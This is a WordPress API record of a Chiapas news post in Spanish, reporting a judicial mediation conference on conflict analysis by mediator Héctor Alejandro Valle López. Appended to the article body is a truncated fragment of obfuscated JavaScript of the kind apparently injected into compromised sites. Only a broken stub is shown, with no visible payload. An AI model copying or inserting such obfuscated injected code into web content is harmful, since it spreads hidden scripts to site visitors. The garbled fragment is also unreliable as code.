{"id":5517,"date":"2022-09-30T17:20:58","date_gmt":"2022-09-30T17:20:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5517"},"modified":"2022-09-30T17:20:58","modified_gmt":"2022-09-30T17:20:58","slug":"realiza-poder-judicial-conferencia-sobre-analisis-del-conflicto","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5517","title":{"rendered":"Realiza Poder Judicial conferencia sobre an\u00e1lisis del conflicto"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"443\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1664493048968.jpg\" alt=\"\" class=\"wp-image-5518\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1664493048968.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1664493048968-300x185.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>29 de septiembre del 2022. Tuxtla Guti\u00e9rrez. &#8211; Continuando con las actividades programadas en la Semana de la Mediaci\u00f3n Por una cultura de paz, que realiza el Poder Judicial del Estado, en conmemoraci\u00f3n de los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en la entidad, se llev\u00f3 a cabo la conferencia virtual An\u00e1lisis del Conflicto, disertada por el mediador y especialista del Instituto de Mediaci\u00f3n en M\u00e9xico, H\u00e9ctor Alejandro Valle L\u00f3pez.<\/p>\n\n\n\n<p>Esta conferencia, que realiz\u00f3 el Centro Estatal de Justicia Alternativa (CEJA) en coordinaci\u00f3n con el Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, se transmiti\u00f3 a trav\u00e9s del Facebook Live del Poder Judicial del Estado de Chiapas, donde permanecer\u00e1 cargada a fin de consulta.<\/p>\n\n\n\n<p>El ponente Alejandro Valle L\u00f3pez manifest\u00f3 sentirse contento con la invitaci\u00f3n que le hiciera esta instituci\u00f3n para participar en esta actividad, y durante su conferencia el especialista mediador abord\u00f3 los temas que iban desde la ra\u00edz del conflicto, su definici\u00f3n, la teor\u00eda, la narrativa, la coherencia narrativa, las tramas, el tema, los personajes y el contexto, entre otros elementos inmersos en el conflicto.<\/p>\n\n\n\n<p>Cabe mencionar que, el ponente Valle L\u00f3pez, es especialista en c\u00edrculos de paz y en psicoterapia para diferentes institutos como la American Bar Association Rule of Law (ABARoli), el Instituto Internacional de Justicia Restaurativa y Derecho (IIDEJURE), la Sociedad Cient\u00edfica de Justicia Restaurativa (SCJR) y el Concejo Certificador de Psicolog\u00eda Forense. Adem\u00e1s ha sido formador de personas mediadoras y facilitadoras en los diferentes estados de la Rep\u00fablica y en diferentes pa\u00edses como Honduras, Brasil, Per\u00fa y Espa\u00f1a.<\/p>\n\n\n\n<p>Esta jornada de actividades en Justicia Alternativa, son parte del compromiso de capacitaci\u00f3n que el Poder Judicial y el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, as\u00ed como titular del Poder Judicial del Estado, Guillermo Ramos P\u00e9rez, han hecho no s\u00f3lo ante las y los integrantes de esta casa de la justicia, sino tambi\u00e9n con diversos sectores de nuestra sociedad chiapaneca, pero principalmente con las personas usuarias y la protecci\u00f3n de su derecho al acceso a la justicia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>29 de septiembre del 2022. Tuxtla Guti\u00e9rrez. &#8211; Continuando con las actividades programadas en la Semana de la Mediaci\u00f3n Por una cultura de paz, que realiza el Poder Judicial del Estado, en conmemoraci\u00f3n de los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en la entidad, se llev\u00f3 a cabo la conferencia virtual An\u00e1lisis &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5518,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5517","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5517","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5517"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5517\/revisions"}],"predecessor-version":[{"id":5519,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5517\/revisions\/5519"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5518"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5517"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}